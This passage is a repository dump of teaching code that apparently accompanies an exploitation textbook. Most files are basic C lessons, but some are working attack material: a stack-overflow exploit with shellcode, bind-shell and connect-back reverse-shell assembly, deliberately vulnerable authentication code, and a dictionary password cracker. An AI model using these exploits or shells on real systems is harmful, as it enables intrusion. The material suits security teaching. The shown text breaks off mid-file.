├── addr_struct.c ├── addressof.c ├── addressof2.c ├── aslr_demo.c ├── aslr_execl.c ├── aslr_execl_exploit.c ├── auth_overflow.c ├── auth_overflow2.c ├── bind_port.c ├── bind_port.s ├── bind_shell ├── bind_shell.s ├── bind_shell_beta ├── bind_shell_beta.s ├── bitwise.c ├── char_array.c ├── char_array2.c ├── commandline.c ├── connectback_shell ├── connectback_shell.s ├── convert.c ├── convert2.c ├── crypt_crack.c ├── crypt_test.c ├── datatype_sizes.c ├── decode_sniff.c ├── dissembler.c ├── drop_privs.c ├── dtors_sample.c ├── encoded_socket_reuse_restore ├── encoded_sockreuserestore ├── encoded_sockreuserestore.s ├── encoded_sockreuserestore_dbg.s ├── errorchecked_heap.c ├── evil_name ├── exec_shell ├── exec_shell.c ├── exec_shell.s ├── exploit_buffer ├── exploit_notesearch.c ├── exploit_notesearch_env.c ├── fcntl_flags.c ├── find_jmpesp.c ├── firstprog.c ├── fms.c ├── fmt_strings.c ├── fmt_uncommon.c ├── fmt_uncommon2.c ├── fmt_vuln.c ├── fmt_vuln2.c ├── funcptr_example.c ├── game_of_chance.c ├── getenv_example.c ├── getenvaddr.c ├── hacking-network.h ├── hacking.h ├── heap_example.c ├── helloworld.asm ├── helloworld.c ├── helloworld.o ├── helloworld1 ├── helloworld1.s ├── helloworld2.s ├── helloworld3 ├── helloworld3.s ├── host_lookup.c ├── input.c ├── loopback_shell ├── loopback_shell.s ├── loopback_shell_restore ├── loopback_shell_restore.s ├── mark ├── mark.s ├── mark_break ├── mark_break.s ├── mark_restore ├── mark_restore.s ├── memory_segments.c ├── notesearch.c ├── notetaker.c ├── overflow_example.c ├── pcap_sniff.c ├── pointer.c ├── pointer_types.c ├── pointer_types2.c ├── pointer_types3.c ├── pointer_types4.c ├── pointer_types5.c ├── portbinding_shellcode ├── ppm_crack.c ├── ppm_gen.c ├── printable.s ├── printable_helper.c ├── priv_shell ├── priv_shell.s ├── rand_example.c ├── raw_tcpsniff.c ├── rst_hijack.c ├── scope.c ├── scope2.c ├── scope3.c ├── shellcode ├── shellcode.bin ├── shellcode.s ├── shroud.c ├── signal_example.c ├── simple_server.c ├── simplenote.c ├── socket_reuse_restore ├── socket_reuse_restore.s ├── stack_example.c ├── static.c ├── static2.c ├── synflood.c ├── time_example.c ├── time_example2.c ├── tiny_shell ├── tiny_shell.s ├── tinyweb.c ├── tinyweb_exploit.c ├── tinyweb_exploit2.c ├── tinywebd.c ├── typecasting.c ├── uid_demo.c ├── update_info.c ├── vuln.c ├── webroot ├── image.jpg └── index.html ├── webserver_id.c ├── xtool_tinywebd.sh ├── xtool_tinywebd_cback.sh ├── xtool_tinywebd_reuse.sh ├── xtool_tinywebd_silent.sh ├── xtool_tinywebd_spoof.sh └── xtool_tinywebd_steath.sh /addr_struct.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | int main(int argc, char *argv[]) { 6 | struct sockaddr_in addr; 7 | if(argc != 3) { 8 | printf("Usage: %s \n", argv[0]); 9 | exit(0); 10 | } 11 | addr.sin_family = AF_INET; 12 | addr.sin_port = htons(atoi(argv[2])); 13 | addr.sin_addr.s_addr = inet_addr(argv[1]); 14 | 15 | write(1, &addr, sizeof(struct sockaddr_in)); 16 | 17 | } 18 | 19 | 20 | -------------------------------------------------------------------------------- /addressof.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() { 4 | int int_var = 5; 5 | int *int_ptr; 6 | 7 | int_ptr = &int_var; // put the address of int_var into int_ptr 8 | } 9 | -------------------------------------------------------------------------------- /addressof2.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() { 4 | int int_var = 5; 5 | int *int_ptr; 6 | 7 | int_ptr = &int_var; // put the address of int_var into int_ptr 8 | 9 | printf("int_ptr = 0x%08x\n", int_ptr); 10 | printf("&int_ptr = 0x%08x\n", &int_ptr); 11 | printf("*int_ptr = 0x%08x\n\n", *int_ptr); 12 | 13 | printf("int_var is located at 0x%08x and contains %d\n", &int_var, int_var); 14 | printf("int_ptr is located at 0x%08x, contains 0x%08x, and points to %d\n\n", 15 | &int_ptr, int_ptr, *int_ptr); 16 | } 17 | -------------------------------------------------------------------------------- /aslr_demo.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int argc, char *argv[]) { 4 | char buffer[50]; 5 | 6 | printf("buffer is at %p\n", &buffer); 7 | 8 | if(argc > 1) 9 | strcpy(buffer, argv[1]); 10 | 11 | return 1; 12 | } 13 | -------------------------------------------------------------------------------- /aslr_execl.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(int argc, char *argv[]) { 5 | int stack_var; 6 | 7 | // print an address from the current stack frame 8 | printf("stack_var is at %p\n", &stack_var); 9 | 10 | // start aslr_demo, to see how it's stack is arranged 11 | execl("./aslr_demo", "aslr_demo", NULL); 12 | } 13 | 14 | -------------------------------------------------------------------------------- /aslr_execl_exploit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | char shellcode[]= 6 | "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68" 7 | "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89" 8 | "\xe1\xcd\x80"; // standard shellcode 9 | 10 | int main(int argc, char *argv[]) { 11 | unsigned int i, ret, offset; 12 | char buffer[1000]; 13 | 14 | printf("i is at %p\n", &i); 15 | 16 | if(argc > 1) // set offset 17 | offset = atoi(argv[1]); 18 | 19 | ret = (unsigned int) &i - offset + 200; // set return address 20 | printf("ret addr is %p\n", ret); 21 | 22 | for(i=0; i < 90; i+=4) // fill buffer with return address 23 | *((unsigned int *)(buffer+i)) = ret; 24 | memset(buffer+84, 0x90, 900); // build NOP sled 25 | memcpy(buffer+900, shellcode, sizeof(shellcode)); 26 | 27 | execl("./aslr_demo", "aslr_demo", buffer, NULL); 28 | } 29 | 30 | -------------------------------------------------------------------------------- /auth_overflow.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int check_authentication(char *password) { 6 | int auth_flag = 0; 7 | char password_buffer[16]; 8 | 9 | strcpy(password_buffer, password); 10 | 11 | if(strcmp(password_buffer, "brillig") == 0) 12 | auth_flag = 1; 13 | if(strcmp(password_buffer, "outgrabe") == 0) 14 | auth_flag = 1; 15 | 16 | return auth_flag; 17 | } 18 | 19 | int main(int argc, char *argv[]) { 20 | if(argc < 2) { 21 | printf("Usage: %s \n", argv[0]); 22 | exit(0); 23 | } 24 | if(check_authentication(argv[1])) { 25 | printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); 26 | printf(" Access Granted.\n"); 27 | printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); 28 | } else { 29 | printf("\nAccess Denied.\n"); 30 | } 31 | } 32 | 33 | -------------------------------------------------------------------------------- /auth_overflow2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int check_authentication(char *password) { 6 | char password_buffer[16]; 7 | int auth_flag = 0; 8 | 9 | strcpy(password_buffer, password); 10 | 11 | if(strcmp(password_buffer, "brillig") == 0) 12 | auth_flag = 1; 13 | if(strcmp(password_buffer, "outgrabe") == 0) 14 | auth_flag = 1; 15 | 16 | return auth_flag; 17 | } 18 | 19 | int main(int argc, char *argv[]) { 20 | if(argc < 2) { 21 | printf("Usage: %s \n", argv[0]); 22 | exit(0); 23 | } 24 | if(check_authentication(argv[1])) { 25 | printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); 26 | printf(" Access Granted.\n"); 27 | printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); 28 | } else { 29 | printf("\nAccess Denied.\n"); 30 | } 31 | } 32 | 33 | -------------------------------------------------------------------------------- /bind_port.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | int main(void) { 8 | int sockfd, new_sockfd; // listen on sock_fd, new connection on new_fd 9 | struct sockaddr_in host_addr, client_addr; // my address information 10 | socklen_t sin_size; 11 | int yes=1; 12 | 13 | sockfd = socket(PF_INET, SOCK_STREAM, 0); 14 | 15 | host_addr.sin_family = AF_INET; // host byte order 16 | host_addr.sin_port = htons(31337); // short, network byte order 17 | host_addr.sin_addr.s_addr = INADDR_ANY; // automatically fill with my IP 18 | memset(&(host_addr.sin_zero), '\0', 8); // zero the rest of the struct 19 | 20 | bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)); 21 | 22 | listen(sockfd, 4); 23 | 24 | sin_size = sizeof(struct sockaddr_in); 25 | new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size); 26 | } 27 | -------------------------------------------------------------------------------- /bind_port.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | ; s = socket(2, 1, 0) 4 | push BYTE 0x66 ; socketcall is syscall #102 (0x66) 5 | pop eax 6 | cdq ; zero out edx for use as a null DWORD later 7 | xor ebx, ebx ; ebx is the type of socketcall 8 | inc ebx ; 1 = SYS_SOCKET = socket() 9 | push edx ; Build arg array: { protocol = 0, 10 | push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1, 11 | push BYTE 0x2 ; AF_INET = 2 } 12 | mov ecx, esp ; ecx = ptr to argument array 13 | int 0x80 ; after syscall, eax has socket file descriptor 14 | 15 | mov esi, eax ; save socket FD in esi for later 16 | 17 | ; bind(s, [2, 31337, 0], 16) 18 | push BYTE 0x66 ; socketcall (syscall #102) 19 | pop eax 20 | inc ebx ; ebx = 2 = SYS_BIND = bind() 21 | push edx ; Build sockaddr struct: INADDR_ANY = 0 22 | push WORD 0x697a ; (in reverse order) PORT = 31337 23 | push WORD bx ; AF_INET = 2 24 | mov ecx, esp ; ecx = server struct pointer 25 | push BYTE 16 ; argv: { sizeof(server struct) = 16, 26 | push ecx ; server struct pointer, 27 | push esi ; socket file descriptor } 28 | mov ecx, esp ; ecx = argument array 29 | int 0x80 ; eax = 0 on success 30 | 31 | ; listen(s, 0) 32 | mov BYTE al, 0x66 ; socketcall (syscall #102) 33 | inc ebx 34 | inc ebx ; ebx = 4 = SYS_LISTEN = listen() 35 | push ebx ; argv: { backlog = 4, 36 | push esi ; socket fd } 37 | mov ecx, esp ; ecx = argument array 38 | int 0x80 39 | 40 | ; c = accept(s, 0, 0) 41 | mov BYTE al, 0x66 ; socketcall (syscall #102) 42 | inc ebx ; ebx = 5 = SYS_ACCEPT = accept() 43 | push edx ; argv: { socklen = 0, 44 | push edx ; sockaddr ptr = NULL, 45 | push esi ; socket fd } 46 | mov ecx, esp ; ecx = argument array 47 | int 0x80 ; eax = connected socket FD 48 | 49 | 50 | -------------------------------------------------------------------------------- /bind_shell: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/bind_shell -------------------------------------------------------------------------------- /bind_shell.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | ; s = socket(2, 1, 0) 4 | push BYTE 0x66 ; socketcall is syscall #102 (0x66) 5 | pop eax 6 | cdq ; zero out edx for use as a null DWORD later 7 | xor ebx, ebx ; ebx is the type of socketcall 8 | inc ebx ; 1 = SYS_SOCKET = socket() 9 | push edx ; Build arg array: { protocol = 0, 10 | push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1, 11 | push BYTE 0x2 ; AF_INET = 2 } 12 | mov ecx, esp ; ecx = ptr to argument array 13 | int 0x80 ; after syscall, eax has socket file descriptor 14 | 15 | xchg esi, eax ; save socket FD in esi for later 16 | 17 | ; bind(s, [2, 31337, 0], 16) 18 | push BYTE 0x66 ; socketcall (syscall #102) 19 | pop eax 20 | inc ebx ; ebx = 2 = SYS_BIND = bind() 21 | push edx ; Build sockaddr struct: INADDR_ANY = 0 22 | push WORD 0x697a ; (in reverse order) PORT = 31337 23 | push WORD bx ; AF_INET = 2 24 | mov ecx, esp ; ecx = server struct pointer 25 | push BYTE 16 ; argv: { sizeof(server struct) = 16, 26 | push ecx ; server struct pointer, 27 | push esi ; socket file descriptor } 28 | mov ecx, esp ; ecx = argument array 29 | int 0x80 ; eax = 0 on success 30 | 31 | ; listen(s, 0) 32 | mov BYTE al, 0x66 ; socketcall (syscall #102) 33 | inc ebx 34 | inc ebx ; ebx = 4 = SYS_LISTEN = listen() 35 | push ebx ; argv: { backlog = 4, 36 | push esi ; socket fd } 37 | mov ecx, esp ; ecx = argument array 38 | int 0x80 39 | 40 | ; c = accept(s, 0, 0) 41 | mov BYTE al, 0x66 ; socketcall (syscall #102) 42 | inc ebx ; ebx = 5 = SYS_ACCEPT = accept() 43 | push edx ; argv: { socklen = 0, 44 | push edx ; sockaddr ptr = NULL, 45 | push esi ; socket fd } 46 | mov ecx, esp ; ecx = argument array 47 | int 0x80 ; eax = connected socket FD 48 | 49 | ; dup2(connected socket, {all three standard I/O file descriptors}) 50 | xchg eax, ebx ; put socket FD in ebx and 0x00000005 in eax 51 | push BYTE 0x2 ; ecx starts at 2 52 | pop ecx 53 | dup_loop: 54 | mov BYTE al, 0x3F ; dup2 syscall #63 55 | int 0x80 ; dup2(c, 0) 56 | dec ecx ; count down to 0 57 | jns dup_loop ; if the sign flag is not set, ecx is not negative 58 | 59 | ; execve(const char *filename, char *const argv [], char *const envp[]) 60 | mov BYTE al, 11 ; execve syscall #11 61 | push edx ; push some nulls for string termination 62 | push 0x68732f2f ; push "//sh" to the stack 63 | push 0x6e69622f ; push "/bin" to the stack 64 | mov ebx, esp ; put the address of "/bin//sh" into ebx, via esp 65 | push edx ; push 32-bit null terminator to stack 66 | mov edx, esp ; this is an empty array for envp 67 | push ebx ; push string addr to stack above null terminator 68 | mov ecx, esp ; this is the argv array with string ptr 69 | int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL]) 70 | -------------------------------------------------------------------------------- /bind_shell_beta: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/bind_shell_beta -------------------------------------------------------------------------------- /bind_shell_beta.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | ; s = socket(2, 1, 0) 4 | push BYTE 0x66 ; socketcall is syscall #102 (0x66) 5 | pop eax 6 | cdq ; zero out edx for use as a null DWORD later 7 | xor ebx, ebx ; ebx is the type of socketcall 8 | inc ebx ; 1 = SYS_SOCKET = socket() 9 | push edx ; Build arg array: { protocol = 0, 10 | push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1, 11 | push BYTE 0x2 ; AF_INET = 2 } 12 | mov ecx, esp ; ecx = ptr to argument array 13 | int 0x80 ; after syscall, eax has socket file descriptor 14 | 15 | mov esi, eax ; save socket FD in esi for later 16 | 17 | ; bind(s, [2, 31337, 0], 16) 18 | push BYTE 0x66 ; socketcall (syscall #102) 19 | pop eax 20 | inc ebx ; ebx = 2 = SYS_BIND = bind() 21 | push edx ; Build sockaddr struct: INADDR_ANY = 0 22 | push WORD 0x697a ; (in reverse order) PORT = 31337 23 | push WORD bx ; AF_INET = 2 24 | mov ecx, esp ; ecx = server struct pointer 25 | push BYTE 16 ; argv: { sizeof(server struct) = 16, 26 | push ecx ; server struct pointer, 27 | push esi ; socket file descriptor } 28 | mov ecx, esp ; ecx = argument array 29 | int 0x80 ; eax = 0 on success 30 | 31 | ; listen(s, 0) 32 | mov BYTE al, 0x66 ; socketcall (syscall #102) 33 | inc ebx 34 | inc ebx ; ebx = 4 = SYS_LISTEN = listen() 35 | push ebx ; argv: { backlog = 4, 36 | push esi ; socket fd } 37 | mov ecx, esp ; ecx = argument array 38 | int 0x80 39 | 40 | ; c = accept(s, 0, 0) 41 | mov BYTE al, 0x66 ; socketcall (syscall #102) 42 | inc ebx ; ebx = 5 = SYS_ACCEPT = accept() 43 | push edx ; argv: { socklen = 0, 44 | push edx ; sockaddr ptr = NULL, 45 | push esi ; socket fd } 46 | mov ecx, esp ; ecx = argument array 47 | int 0x80 ; eax = connected socket FD 48 | 49 | ; dup2(connected socket, {all three standard I/O file descriptors}) 50 | mov ebx, eax ; move socket FD in ebx 51 | push BYTE 0x3F ; dup2 syscall #63 52 | pop eax 53 | xor ecx, ecx ; ecx = 0 = standard input 54 | int 0x80 ; dup(c, 0) 55 | mov BYTE al, 0x3F ; dup2 syscall #63 56 | inc ecx ; ecx = 1 = standard output 57 | int 0x80 ; dup(c, 1) 58 | mov BYTE al, 0x3F ; dup2 syscall #63 59 | inc ecx ; ecx = 2 = standard error 60 | int 0x80 ; dup(c, 2) 61 | 62 | ; execve(const char *filename, char *const argv [], char *const envp[]) 63 | mov BYTE al, 11 ; execve syscall #11 64 | push edx ; push some nulls for string termination 65 | push 0x68732f2f ; push "//sh" to the stack 66 | push 0x6e69622f ; push "/bin" to the stack 67 | mov ebx, esp ; put the address of "/bin//sh" into ebx, via esp 68 | push edx ; push 32-bit null terminator to stack 69 | mov edx, esp ; this is an empty array for envp 70 | push ebx ; push string addr to stack above null terminator 71 | mov ecx, esp ; this is the argv array with string ptr 72 | int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL]) 73 | -------------------------------------------------------------------------------- /bitwise.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() { 4 | int i, bit_a, bit_b; 5 | printf("bitwise OR operator |\n"); 6 | for(i=0; i < 4; i++) { 7 | bit_a = (i & 2) / 2; // get the second bit 8 | bit_b = (i & 1); // get the first bit 9 | printf("%d | %d = %d\n", bit_a, bit_b, bit_a | bit_b); 10 | } 11 | printf("\nbitwise AND operator &\n"); 12 | for(i=0; i < 4; i++) { 13 | bit_a = (i & 2) / 2; // get the second bit 14 | bit_b = (i & 1); // get the first bit 15 | printf("%d & %d = %d\n", bit_a, bit_b, bit_a & bit_b); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /char_array.c: -------------------------------------------------------------------------------- 1 | #include 2 | int main() 3 | { 4 | char str_a[20]; 5 | str_a[0] = 'H'; 6 | str_a[1] = 'e'; 7 | str_a[2] = 'l'; 8 | str_a[3] = 'l'; 9 | str_a[4] = 'o'; 10 | str_a[5] = ','; 11 | str_a[6] = ' '; 12 | str_a[7] = 'w'; 13 | str_a[8] = 'o'; 14 | str_a[9] = 'r'; 15 | str_a[10] = 'l'; 16 | str_a[11] = 'd'; 17 | str_a[12] = '!'; 18 | str_a[13] = '\n'; 19 | str_a[14] = 0; 20 | printf(str_a); 21 | } 22 | -------------------------------------------------------------------------------- /char_array2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() { 5 | char str_a[20]; 6 | 7 | strcpy(str_a, "Hello World!\n"); 8 | printf(str_a); 9 | } 10 | -------------------------------------------------------------------------------- /commandline.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int arg_count, char *arg_list[]) { 4 | int i; 5 | printf("There were %d arguments provided:\n", arg_count); 6 | for(i=0; i < arg_count; i++) 7 | printf("argument #%d\t-\t%s\n", i, arg_list[i]); 8 | } 9 | -------------------------------------------------------------------------------- /connectback_shell: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/connectback_shell -------------------------------------------------------------------------------- /connectback_shell.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | ; s = socket(2, 1, 0) 4 | push BYTE 0x66 ; socketcall is syscall #102 (0x66) 5 | pop eax 6 | cdq ; zero out edx for use as a null DWORD later 7 | xor ebx, ebx ; ebx is the type of socketcall 8 | inc ebx ; 1 = SYS_SOCKET = socket() 9 | push edx ; Build arg array: { protocol = 0, 10 | push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1, 11 | push BYTE 0x2 ; AF_INET = 2 } 12 | mov ecx, esp ; ecx = ptr to argument array 13 | int 0x80 ; after syscall, eax has socket file descriptor 14 | 15 | xchg esi, eax ; save socket FD in esi for later 16 | 17 | ; connect(s, [2, 31337, ], 16) 18 | push BYTE 0x66 ; socketcall (syscall #102) 19 | pop eax 20 | inc ebx ; ebx = 2 (needed for AF_INET) 21 | push DWORD 0x482aa8c0 ; Build sockaddr struct: IP Address = 192.168.42.72 22 | push WORD 0x697a ; (in reverse order) PORT = 31337 23 | push WORD bx ; AF_INET = 2 24 | mov ecx, esp ; ecx = server struct pointer 25 | push BYTE 16 ; argv: { sizeof(server struct) = 16, 26 | push ecx ; server struct pointer, 27 | push esi ; socket file descriptor } 28 | mov ecx, esp ; ecx = argument array 29 | inc ebx ; ebx = 3 = SYS_CONNECT = connect() 30 | int 0x80 ; eax = 0 on successful connection 31 | 32 | ; jz success ; if connection successful, jump down to spawn shell 33 | ; xor eax, eax ; otherwise, exit cleanly 34 | ; inc eax ; eax = 1 exit (syscall #1) 35 | ; xor ebx, ebx ; status = 0 (nothing to see here) 36 | ; int 0x80 37 | 38 | ;success: 39 | ; dup2(connected socket, {all three standard I/O file descriptors}) 40 | xchg esi, ebx ; put socket FD from esi into ebx (esi = 3) 41 | xchg ecx, esi ; ecx = 3 42 | dec ecx ; ecx starts at 2 43 | ; xchg eax, esi ; eax = 0x00000003 44 | ; push BYTE 0x2 45 | ; pop ecx ; ecx starts at 2 46 | dup_loop: 47 | mov BYTE al, 0x3F ; dup2 syscall #63 48 | int 0x80 ; dup2(c, 0) 49 | dec ecx ; count down to 0 50 | jns dup_loop ; if the sign flag is not set, ecx is not negative 51 | 52 | ; execve(const char *filename, char *const argv [], char *const envp[]) 53 | mov BYTE al, 11 ; execve syscall #11 54 | push edx ; push some nulls for string termination 55 | push 0x68732f2f ; push "//sh" to the stack 56 | push 0x6e69622f ; push "/bin" to the stack 57 | mov ebx, esp ; put the address of "/bin//sh" into ebx, via esp 58 | push edx ; push 32-bit null terminator to stack 59 | mov edx, esp ; this is an empty array for envp 60 | push ebx ; push string addr to stack above null terminator 61 | mov ecx, esp ; this is the argv array with string ptr 62 | int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL]) 63 | -------------------------------------------------------------------------------- /convert.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void usage(char *program_name) { 4 | printf("Usage: %s <# of times to repeat>\n", program_name); 5 | exit(1); 6 | } 7 | 8 | int main(int argc, char *argv[]) { 9 | int i, count; 10 | 11 | if(argc < 3) // If less than 3 arguments are used, 12 | usage(argv[0]); // display usage message and exit. 13 | 14 | count = atoi(argv[2]); // convert the 2nd arg into an integer 15 | printf("Repeating %d times..\n", count); 16 | 17 | for(i=0; i < count; i++) 18 | printf("%3d - %s\n", i, argv[1]); // print the 1st arg 19 | } 20 | -------------------------------------------------------------------------------- /convert2.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void usage(char *program_name) { 4 | printf("Usage: %s <# of times to repeat>\n", program_name); 5 | exit(1); 6 | } 7 | 8 | int main(int argc, char *argv[]) { 9 | int i, count; 10 | 11 | // if(argc < 3) // If less than 3 arguments are used, 12 | // usage(argv[0]); // display usage message and exit. 13 | 14 | count = atoi(argv[2]); // convert the 2nd arg into an integer 15 | printf("Repeating %d times..\n", count); 16 | 17 | for(i=0; i < count; i++) 18 | printf("%3d - %s\n", i, argv[1]); // print the 1st arg 19 | } 20 | -------------------------------------------------------------------------------- /crypt_crack.c: -------------------------------------------------------------------------------- 1 | #define _XOPEN_SOURCE 2 | #include 3 | #include 4 | 5 | /* barf a message and exit */ 6 | void barf(char *message, char *extra) { 7 | printf(message, extra); 8 | exit(1); 9 | } 10 | 11 | /* a dictionary attack example program */ 12 | int main(int argc, char *argv[]) { 13 | FILE *wordlist; 14 | char *hash, word[30], salt[3]; 15 | if(argc < 2) 16 | barf("Usage: %s \n", argv[0]); 17 | 18 | strncpy(salt, argv[2], 2); // first 2 bytes of hash are the salt 19 | salt[2] = '\0'; // terminate string 20 | 21 | printf("Salt value is \'%s\'\n", salt); 22 | 23 | if( (wordlist = fopen(argv[1], "r")) == NULL) // open the wordlist 24 | barf("Fatal: couldn't open the file \'%s\'.\n", argv[1]); 25 | 26 | while(fgets(word, 30, wordlist) != NULL) { // read each word 27 | word[strlen(word)-1] = '\0'; // remove the '\n' byte at the end 28 | hash = crypt(word, salt); // hash the word using the salt 29 | printf("trying word: %-30s ==> %15s\n", word, hash); 30 | if(strcmp(hash, argv[2]) == 0) { // if the hash matches 31 | printf("The hash \"%s\" is from the ", argv[2]); 32 | printf("plaintext password \"%s\".\n", word); 33 | fclose(wordlist); 34 | exit(0); 35 | } 36 | } 37 | printf("Couldn't find the plaintext password in the supplied wordlist.\n"); 38 | fclose(wordlist); 39 | } 40 | -------------------------------------------------------------------------------- /crypt_test.c: -------------------------------------------------------------------------------- 1 | #define _XOPEN_SOURCE 2 | #include 3 | #include 4 | 5 | int main(int argc, char *argv[]) { 6 | if(argc < 2) { 7 | printf("Usage: %s <salt value>\n", argv[0]); 8 | exit(1); 9 | } 10 | printf("password \"%s\" with salt \"%s\" ", argv[1], argv[2]); 11 | printf("hashes to ==> %s\n", crypt(argv[1], argv[2])); 12 | } 13 | -------------------------------------------------------------------------------- /datatype_sizes.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | int main() { 4 | printf("The 'int' data type is\t\t %d bytes\n", sizeof(int)); 5 | printf("The 'unsigned int' data type is\t %d bytes\n", sizeof(unsigned int)); 6 | printf("The 'short int' data type is\t %d bytes\n", sizeof(short int)); 7 | printf("The 'long int' data type is\t %d bytes\n", sizeof(long int)); 8 | printf("The 'long long int' data type is %d bytes\n", sizeof(long long int)); 9 | printf("The 'float' data type is\t %d bytes\n", sizeof(float)); 10 | printf("The 'char' data type is\t\t %d bytes\n", sizeof(char)); 11 | } 12 | -------------------------------------------------------------------------------- /decode_sniff.c: -------------------------------------------------------------------------------- 1 | #include <pcap.h> 2 | #include "hacking.h" 3 | #include "hacking-network.h" 4 | 5 | void pcap_fatal(const char *, const char *); 6 | void decode_ethernet(const u_char *); 7 | void decode_ip(const u_char *); 8 | u_int decode_tcp(const u_char *); 9 | 10 | void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *); 11 | 12 | int main() { 13 | struct pcap_pkthdr cap_header; 14 | const u_char *packet, *pkt_data; 15 | char errbuf[PCAP_ERRBUF_SIZE]; 16 | char *device; 17 | 18 | pcap_t *pcap_handle; 19 | 20 | device = pcap_lookupdev(errbuf); 21 | if(device == NULL) 22 | pcap_fatal("pcap_lookupdev", errbuf); 23 | 24 | printf("Sniffing on device %s\n", device); 25 | 26 | pcap_handle = pcap_open_live(device, 4096, 1, 0, errbuf); 27 | if(pcap_handle == NULL) 28 | pcap_fatal("pcap_open_live", errbuf); 29 | 30 | pcap_loop(pcap_handle, 3, caught_packet, NULL); 31 | 32 | pcap_close(pcap_handle); 33 | } 34 | 35 | void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char *packet) { 36 | int tcp_header_length, total_header_size, pkt_data_len; 37 | u_char *pkt_data; 38 | 39 | printf("==== Got a %d byte packet ====\n", cap_header->len); 40 | 41 | 42 | decode_ethernet(packet); 43 | decode_ip(packet+ETHER_HDR_LEN); 44 | tcp_header_length = decode_tcp(packet+ETHER_HDR_LEN+sizeof(struct ip_hdr)); 45 | 46 | total_header_size = ETHER_HDR_LEN+sizeof(struct ip_hdr)+tcp_header_length; 47 | pkt_data = (u_char *)packet + total_header_size; // pkt_data points to the data portion 48 | pkt_data_len = cap_header->len - total_header_size; 49 | if(pkt_data_len > 0) { 50 | printf("\t\t\t%u bytes of packet data\n", pkt_data_len); 51 | dump(pkt_data, pkt_data_len); 52 | } else 53 | printf("\t\t\tNo Packet Data\n"); 54 | } 55 | 56 | void pcap_fatal(const char *failed_in, const char *errbuf) { 57 | printf("Fatal Error in %s: %s\n", failed_in, errbuf); 58 | exit(1); 59 | } 60 | 61 | void decode_ethernet(const u_char *header_start) { 62 | int i; 63 | const struct ether_hdr *ethernet_header; 64 | 65 | ethernet_header = (const struct ether_hdr *)header_start; 66 | printf("[[ Layer 2 :: Ethernet Header ]]\n"); 67 | printf("[ Source: %02x", ethernet_header->ether_src_addr[0]); 68 | for(i=1; i < ETHER_ADDR_LEN; i++) 69 | printf(":%02x", ethernet_header->ether_src_addr[i]); 70 | 71 | printf("\tDest: %02x", ethernet_header->ether_dest_addr[0]); 72 | for(i=1; i < ETHER_ADDR_LEN; i++) 73 | printf(":%02x", ethernet_header->ether_dest_addr[i]); 74 | printf("\tType: %hu ]\n", ethernet_header->ether_type); 75 | } 76 | 77 | void decode_ip(const u_char *header_start) { 78 | const struct ip_hdr *ip_header; 79 | 80 | ip_header = (const struct ip_hdr *)header_start; 81 | printf("\t(( Layer 3 ::: IP Header ))\n"); 82 | printf("\t( Source: %s\t", inet_ntoa(ip_header->ip_src_addr)); 83 | printf("Dest: %s )\n", inet_ntoa(ip_header->ip_dest_addr)); 84 | printf("\t( Type: %u\t", (u_int) ip_header->ip_type); 85 | printf("ID: %hu\tLength: %hu )\n", ntohs(ip_header->ip_id), ntohs(ip_header->ip_len)); 86 | } 87 | 88 | u_int decode_tcp(const u_char *header_start) { 89 | u_int header_size; 90 | const struct tcp_hdr *tcp_header; 91 | 92 | tcp_header = (const struct tcp_hdr *)header_start; 93 | header_size = 4 * tcp_header->tcp_offset; 94 | 95 | printf("\t\t{{ Layer 4 :::: TCP Header }}\n"); 96 | printf("\t\t{ Src Port: %hu\t", ntohs(tcp_header->tcp_src_port)); 97 | printf("Dest Port: %hu }\n", ntohs(tcp_header->tcp_dest_port)); 98 | printf("\t\t{ Seq #: %u\t", ntohl(tcp_header->tcp_seq)); 99 | printf("Ack #: %u }\n", ntohl(tcp_header->tcp_ack)); 100 | 